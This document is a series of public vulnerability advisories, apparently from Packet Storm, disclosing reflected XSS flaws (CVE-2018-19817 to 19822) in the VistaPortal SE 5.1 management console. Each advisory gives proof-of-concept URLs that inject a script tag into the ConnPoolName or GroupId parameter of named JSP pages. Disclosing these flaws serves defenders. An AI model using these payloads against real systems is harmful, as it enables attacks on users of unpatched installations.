\n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19817 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/AdminAuthorisationFrame.jsp\" has reflected \nXSS via ConnPoolName and GroupId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \nhttp://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&UserId=4&ConnPoolName=default&type=U \n \nVulnerable parameter: ConnPoolName and GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19818 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/Contacts.jsp\" has reflected XSS via \nConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19819 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/Rights.jsp\" has reflected XSS via \nConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19820 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/Roles.jsp\" has reflected XSS via ConnPoolName \nparameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19821 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/SecurityPolicies.jsp\" has reflected XSS via \nConnPoolName parameter. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \n \nVulnerable parameter: ConnPoolName \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n<!-- \n# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build \n51029) \n# Date: 28-11-2018 \n# Exploit Author: Rafael Pedrero \n# Vendor Homepage: http://www.infovista.com \n# Software Link: http://www.infovista.com \n# Version: VistaPortal SE Version 5.1 (build 51029) \n# Tested on: all \n# CVE : CVE-2018-19822 \n# Category: webapps \n \n1. Description \n \nCross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029). \nThe page \"/VPortal/mgtconsole/SharedCriteria.jsp\" has reflected XSS via \nConnPoolName and GroupId parameters. \n \n \n2. Proof of Concept \n \nhttp://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName= \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&type=U \nhttp://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4 \n'\"><ScRiPt>alert(\"xss\")</ScRiPt>&ConnPoolName=default&type=U \n \nVulnerable parameter: ConnPoolName and GroupId \n \n \n3. Solution: \n \nSolutions in next versions this product. \nPatch: \nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules \n \n--> \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150690/vistaportalse51-xss.txt"}]}
CVE-2018-19821
